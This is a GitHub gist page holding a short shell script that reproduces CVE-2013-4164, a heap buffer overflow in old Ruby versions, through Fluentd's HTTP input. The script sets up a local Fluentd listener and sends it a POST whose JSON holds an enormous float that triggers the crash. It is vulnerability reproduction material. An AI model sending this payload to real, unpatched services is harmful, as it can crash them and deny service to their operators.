-
-
Save kozy4324/7687010 to your computer and use it in GitHub Desktop.
Heap buffer overflow (CVE-2013-4164) occurs in in_http via the HTTP requests with malicious POST data.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # using ruby 2.0.0-p247 | |
| rbenv local 2.0.0-p247 | |
| # install fluentd | |
| echo 'source "https://rubygems.org" | |
| gem "fluentd"' > Gemfile | |
| bundle install --path=bundle | |
| # create fluent.conf | |
| echo '<source> | |
| type http | |
| port 8888 | |
| </source>' > fluent.conf | |
| # create post data | |
| echo 'json={"a":12345.'$(ruby -e "puts 12345.to_s * 100000")'}' > data.json | |
| # run fluentd in background | |
| bundle exec fluentd -c fluent.conf & | |
| sleep 10 | |
| # post data | |
| curl -XPOST -d@data.json http://localhost:8888 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment